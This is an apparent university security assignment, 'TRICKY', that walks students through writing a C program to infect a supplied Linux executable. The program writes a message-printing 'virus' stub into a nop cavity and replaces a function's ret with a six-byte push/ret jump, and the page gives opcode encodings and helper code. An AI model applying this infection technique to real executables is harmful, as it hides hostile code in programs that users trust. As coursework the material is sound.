Assignment: TRICKY

Changelog:

17 Feb 2017: clarified that question 2 is about the tricky jump to the virus code and not anything in the virus code itself
16 Feb 2017: added note in hints about how the virus code returns (and what would be wrong if it segfaults instead)
16 Feb 2017: corrected grammatical error in “Task”
14 Feb 2017: added note about chmod +x
14 Feb 2017: corrected erroneous use of fseek return value in file reading code example below.
11 Feb 2017: The supplied virus code .s and .o included an extra newline in the string to print (but the assembly code on this page did not include it); corrected .s and .o files to not include the newline. (We will accept either version of the virus code being inserted.)

This assignment will explore what it takes to create a stealthy virus that employs a “tricky jump.” A tricky jump is a form of hijacking in which a jump is inserted to call some virus code. The jump is inserted in such a way that after the virus code runs, the program continues normal execution, thereby maintaining stealth.

Task

A “tricky jump” can be efficiently implemented (only six bytes) as:

pushq $AddressOfVirusFunction
ret

This can be encoded on x86-64 using only six bytes, and the encoding does not change based on where the push instruction is placed. This makes it easy to compute the machine code separately from inserting it somewhere, which is why the technique has been commonly seen in viruses.
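As a minimal sketch of why the encoding is position independent, the six bytes can be built from the target address alone. The helper name encode_tricky_jump and the constant TRICKY_JUMP_LEN are hypothetical, and the sketch assumes the virus address fits in 31 bits, since pushq sign-extends its 32-bit immediate to 64 bits.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* 1 opcode byte + 4 immediate bytes + 1 ret byte */
#define TRICKY_JUMP_LEN 6

/* Hypothetical helper: writes the machine code for
   "pushq $target; ret" into out[0..5]. */
void encode_tricky_jump(uint32_t target, unsigned char out[TRICKY_JUMP_LEN]) {
    assert(out != NULL);
    /* pushq sign-extends its immediate, so the top bit must be clear */
    assert(target < 0x80000000u);
    out[0] = 0x68;                              /* push imm32 */
    out[1] = (unsigned char)(target & 0xff);    /* immediate, little-endian */
    out[2] = (unsigned char)((target >> 8) & 0xff);
    out[3] = (unsigned char)((target >> 16) & 0xff);
    out[4] = (unsigned char)((target >> 24) & 0xff);
    out[5] = 0xc3;                              /* ret */
}
```

Nothing in the function depends on where the bytes will be placed, so the same six bytes work at any insertion point.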

One could also implement a “tricky jump” by inserting a conventional jump instruction:

jmp AddressOfVirusFunction

but the target will be encoded as an offset relative to the jump instruction, so the resulting machine code will change based on where the jump is inserted.
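To illustrate the dependence on location, here is a rough sketch of how the five-byte form of jmp (opcode 0xe9 followed by a 32-bit displacement) could be computed. The helper name encode_rel_jump and the parameter name site (the address where the jump is placed) are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* 1 opcode byte + 4 displacement bytes */
#define REL_JUMP_LEN 5

/* Hypothetical helper: writes the machine code for "jmp target" as it
   would appear when placed at address site. */
void encode_rel_jump(uint32_t site, uint32_t target,
                     unsigned char out[REL_JUMP_LEN]) {
    /* The displacement is measured from the end of the jump instruction.
       Unsigned subtraction wraps, which yields the two's complement
       encoding for backward jumps. */
    uint32_t rel = target - (site + REL_JUMP_LEN);
    assert(out != NULL);
    out[0] = 0xe9;                              /* jmp rel32 */
    out[1] = (unsigned char)(rel & 0xff);       /* displacement, little-endian */
    out[2] = (unsigned char)((rel >> 8) & 0xff);
    out[3] = (unsigned char)((rel >> 16) & 0xff);
    out[4] = (unsigned char)((rel >> 24) & 0xff);
}
```

Calling this with the same target but two different values of site produces different bytes, which is exactly the inconvenience the push version avoids.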

When either sequence is executed, control is diverted to the virus code. When the virus code returns, control returns to the function that called the function that contained the tricky jump. If the virus writer inserts the tricky jump at the end of an application function (i.e., to replace the ret), then the program, after the virus code executes, will continue to run as if nothing happened. For example, one might see code like:

  400661:       c3                      retq       
  400662:       66 66 66 66 66 2e 0f    data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
  400669:       1f 84 00 00 00 00 00 

data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1) is objdump’s representation of a 14-byte long nop instruction. This is padding added at the end of the function. This is a “cavity” that gives a virus writer some room to work. If we insert a “tricky jump” starting where the retq instruction is located (address 0x400661), then the virus code will be invoked. When the virus code returns, control will be returned to the function that invoked this function.

For this assignment, you will write a C program that infects a particular Linux executable and causes some virus code to be executed.

The Linux executable you want to infect is called target.exe. target.exe produces the following output:

Initialize application.
Begin application execution.
Terminate application.

(After downloading target.exe, you may need to mark it as executable with a command like chmod +x target.exe. Then you should be able to run it using ./target.exe.)

Your program should modify target.exe into a target-infected.exe which will produce the following output:

Initialize application.
You have been infected with a virus!
Begin application execution.
Terminate application. 

You will use the “tricky jump” method of infection. The push version is probably the easiest to use, but you may use any technique. To simplify this assignment:

The executable has a large “hole” (unused space filled with nops) in which to place the non-malicious “virus code”, and we will supply working “virus code” for you.
You only need to handle infecting this particular executable, but we expect your infection program to be fairly easy to port to new executables. (For example, you should not just have a copy of the output file inside your C file.)

The “virus” code we want you to insert is the following (also available as a .s file or a .o file):

    leal string(%rip), %edi
    pushq $0x4004e0 /* address of puts in target executable */
    retq
string: 
    .asciz "You have been infected with a virus!"

You can copy the resulting machine code into the large cavity in the executable. This assembly code is carefully written to not require changes to the machine code depending on where in the executable it is. (This is why it does not call puts with a jmp or call instruction or use mov $string, %edi.) It will, however, not work in other executables because it hard-codes the address of puts in this executable. (The simplest way to avoid this problem would be to replace the call to puts with a direct use of the system call used to implement puts.)

Submit a C program that, when compiled and executed, reads a C executable called target.exe and produces an executable called target-infected.exe. target-infected.exe must be the same length as target.exe.

Also, answer the following questions:

How did you identify the file offsets in target.exe to overwrite?
How did you produce the machine code to insert for the tricky jump to the virus code?
If your infect.c has a hard-coded offset or something similar, how would you automate finding the location in target.exe to overwrite with a tricky jump so that it would work on other target programs? (For this question, ignore the problem of fixing the inserted “virus” code to work in other executables.)

Submission

Submit the following files:

your infect.c
the target-infected.exe your infect.c produced.
a file answers.txt containing the answers to the above questions.

Methodology and Hints

You should use the utility objdump to examine the executable target.exe. The option --disassemble is useful. In particular, you need to determine the starting address of the virus code. The disassembly will also help you determine the opcodes of the instructions that you need to insert (i.e., a push instruction and a ret instruction). You may wish to consult the objdump manual.
Identify where the constant strings “Initialize application.” and “Begin application execution.” are referenced to locate relevant parts of the application code.
Look for a large area of nops in the disassembly to determine where to insert the virus code. Record the address of this location in memory to generate the “tricky jump” code you will insert elsewhere in the executable.
To insert both the virus code and the tricky jump itself, the trick is that you must map the address of the location in the executable to the offset of the proper byte in the file. You need to do this mapping because the file offset where you want to write is not the same as the address of the instruction when the program is loaded in memory (which is what objdump usually shows you).
- One option is to figure out what options you can pass to objdump to get it to display the offset of code within the executable file.
- Another option is to get a hexadecimal dump of the raw file and look for bytes shown in objdump output in the actual executable file to find their location.
- Yet another option would be for your infect.c to search for particular bytes in the executable file itself.
A push of a 32-bit constant (on 32- or 64-bit x86) can be encoded as an 0x68 byte followed by the (little-endian) constant. A ret is encoded as c3. A jump can be encoded as an 0xe9 byte followed by a 32-bit offset from the address of the following instruction. (An 0xe8 byte followed by the same kind of offset encodes a call rather than a jump.)
A very useful program to examine the file is a hex editor such as ghex. You can install ghex using sudo apt-get install ghex.
To simplify the assignment, you can hardcode the input and output file names in your infect program. That is, infect.c opens and reads target.exe and opens and writes target-infected.exe. After you produce target-infected.exe you will probably need to set the execute permissions on the file.
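One of the options mentioned above for mapping addresses to file offsets is to search the raw file for bytes seen in the objdump output. A minimal sketch of such a search follows; the function name find_bytes is hypothetical, and it assumes the whole file has already been read into memory.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: returns the offset of the first occurrence of
   pattern within data, or -1 if the pattern does not occur. */
long find_bytes(const unsigned char *data, size_t data_len,
                const unsigned char *pattern, size_t pattern_len) {
    size_t i;
    assert(data != NULL && pattern != NULL);
    assert(pattern_len > 0);
    /* Stop early enough that the comparison never reads past the end. */
    for (i = 0; i + pattern_len <= data_len; i++) {
        if (memcmp(data + i, pattern, pattern_len) == 0) {
            return (long)i;
        }
    }
    return -1;
}
```

For instance, searching for the bytes of a retq followed by the start of its padding nop (c3 66 66 ...) would give the file offset of that retq. A short pattern may match in more than one place, so it is worth checking the result against a hex dump.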

To read from and write to a binary file in C, you can use fopen, fread, and fwrite. You can run man fopen, man fread, etc. to get documentation for how these functions are called, or search online. An example usage of a program that copies “input.dat” to “output.dat” is the following:

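 #include <stdio.h>
 #include <stdlib.h>

 int main(void) {
     FILE *in;
     FILE *out;
     char *buffer;
     long size;
     in = fopen("input.dat", "rb");
     if (in == NULL) {
         perror("input.dat");
         return 1;
     }
     /* get size of input.dat, by
        moving to the end of the file */
     fseek(in, 0, SEEK_END);
     size = ftell(in);
     /* then, return to the
        beginning of the file */
     fseek(in, 0, SEEK_SET);
     buffer = malloc(size);
     if (buffer == NULL || fread(buffer, 1, size, in) != (size_t)size) {
         fprintf(stderr, "could not read input.dat\n");
         return 1;
     }
     fclose(in);
     out = fopen("output.dat", "wb");
     if (out == NULL) {
         perror("output.dat");
         return 1;
     }
     fwrite(buffer, 1, size, out);
     /* close the output file (the input file is already closed) */
     fclose(out);
     free(buffer);
     return 0;
 }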

The hard part is figuring out what locations in the file need to be changed and what they should be changed to. The code to do the infection is small.
We are reading and writing binary files, not text files. You may need to open files in binary mode, not text mode.
The virus code we’ve given finishes by returning with a ret instruction. (Strictly, the final return happens inside puts, which the virus code jumps to.) So wherever you insert the tricky jump to the virus function needs to be a place where it is safe to return from. If you are experiencing a segfault after the virus code prints out its message, this is the most likely reason why.
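Since the infected file must be the same length as the original, both the virus code and the tricky jump are written by overwriting bytes in the in-memory copy of the file before it is written back out. A sketch of a bounds-checked overwrite is below; the name patch_bytes is hypothetical, and the offsets to pass are the file offsets you determine yourself.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: overwrites patch_len bytes of buffer starting at
   offset. Returns 0 on success, or -1 (leaving buffer untouched) if the
   patch would run past the end of the buffer. */
int patch_bytes(unsigned char *buffer, size_t size, size_t offset,
                const unsigned char *patch, size_t patch_len) {
    assert(buffer != NULL && patch != NULL);
    /* Written this way so the check itself cannot overflow. */
    if (offset > size || patch_len > size - offset) {
        return -1;
    }
    memcpy(buffer + offset, patch, patch_len);
    return 0;
}
```

Because the function only overwrites existing bytes and never grows the buffer, writing the buffer out afterwards produces a file of the original size.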